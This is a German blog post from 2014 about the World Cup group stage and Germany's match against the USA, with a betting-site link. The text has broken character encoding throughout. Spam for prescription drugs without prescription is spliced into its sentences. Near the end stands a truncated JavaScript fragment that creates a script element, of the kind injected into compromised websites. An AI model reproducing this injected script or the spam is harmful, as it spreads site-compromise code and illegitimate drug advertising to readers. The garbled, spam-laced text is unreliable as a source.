Willkommen auf » WM 2014 Die heiAYe Phase vor dem Achtelfinale
23. Jun 2014

WM 2014 Die heiAYe Phase vor dem Achtelfinale

In diesen Tagen gehen die Gruppenspiele der Weltmeisterschaft 2014 in Brasilien in die entscheidende Phase. Nun heiAYt es fA?r viele Mannschaften: Alles oder Nichts. WAi??hrend mit Spanien und England bereits zwei LAi??nder aus dem erweiterten Favoritenkreis sang- und klanglos aus dem Turnier ausgeschieden sind, mA?ssen andere europAi??ische Teams noch um den Einzug ins Achtelfinale kAi??mpfen, allen voran Deutschland.

Beim 2:2 gegen Ghana am Samstagabend bekamen weder das Team um Joachim LAi??w noch die deutschen Fans eine Chance zum Aufatmen. Ein Sieg hAi??tte den erfolgreichen Abschluss der Gruppenphase bedeutet, doch die starke Mannschaft aus Ghana machte den Deutschen da einen Strich durch die Rechnung. Da sich auch Portugal und die USA mit einem Unentschieden trennten, steht noch immer nicht fest, welche Mannschaften der Gruppe G weiterkommen werden.

USA sollten nicht unterschAi??tzt werden

Sportwettanbieter und Tippgemeinschaften gleichermaAYen stehen vor den letzten Spielen der Gruppenphase Kopf. Hier spielt natA?rlich auch eine Rolle, welche Sympathien man fA?r welche Mannschaft hegt. Betrachtet man bspw. das Spiel der deutschen Nationalmannschaft gegen die USA am Donnerstag, dann werden nur die wenigsten deutschen Fans bei FuAYball WM Wetten auf die USA setzen, obwohl das Team um JA?rgen Klinsmann in den vergangenen Spielen gezeigt hat, dass man durchaus mit ihnen rechnen kann.

Auf den Internetseiten, die sich mit aktuellen Neuigkeiten aus Brasilien beschAi??ftigen, wie zum Beispiel hier http://www.bet365.com/news/de/betting/weltmeisterschaft, wird darA?ber berichtet, welch eine A?berraschungsleistung die Elf aus den USA bei diesem Turnier bisher gebracht hat. Nicht nur haben sie in der ersten Partie Ghana geschlagen, sondern obendrein auch den Portugiesen ein Unentschieden abringen kAi??nnen. Dabei sah es bis kurz vor Schlusspfiff sogar noch nach einem Sieg der USA aus, bis Varela in der Nachspielzeit den Ausgleichstreffer erzielen konnte. Aus deutscher Sicht ist also Vorsicht geboten und genau dies sollten auch Wettfreunde in Betracht ziehen bei der Abgabe ihrer EinschAi??tzungen.

Ein zweiter Nichtangriffspakt?

JA?rgen Klinsmann hat ganze Arbeit geleistet bei diesem Team, das bei vorherigen Weltmeisterschaften meist keine groAYe Rolle spielen konnte. Am Donnerstagabend wA?rde sowohl Deutschland als auch den USA ein Unentschieden reichen, um gemeinsam ins Achtelfinale einzuziehen. Klingt fast so, als online shipping betapace kAi??nnte es Ai??hnlich wie bei der WM 1982 in Spanien zu einem Nichtangriffspakt kommen ditropan 5 mg costo . Doch wenn man die einstigen Kollegen Klinsmann und LAi??w kennt, dann weiAY man, dass beide alles daran setzen werden, ihre jeweilige Mannschaft zum Sieg zu fA?hren. Auf einem Unentschieden wird man es wenn mAi??glich nicht beruhen lassen.

Klinsmann sagte nach dem Spiel gegen Portugal, dass fA?r ihn ein solcher Nichtangriffspakt in keinem Fall in Frage kAi??me. Das sei Teil der deutschen FuAYballgeschichte, habe aber mit den USA nichts zu tun. Es ist unwahrscheinlich, dass er versuchen wird, dies zu Ai??ndern. Und so erwarten uns in dieser Woche noch einige spannende Partien, die letztendlich entscheiden werden, wer ins Achtelfinale der WM 2014 einziehen darf und wer doch schon verfrA?ht die Koffer packen muss. Deutschland zAi??hlt sicherlich zu den Favoriten, doch den Gegner sollte man nicht unterschAi??tzen.var d=document;var s=d.createElement(‚script‘); Buy no prescription needed international Purchase


Einen Kommentar schreiben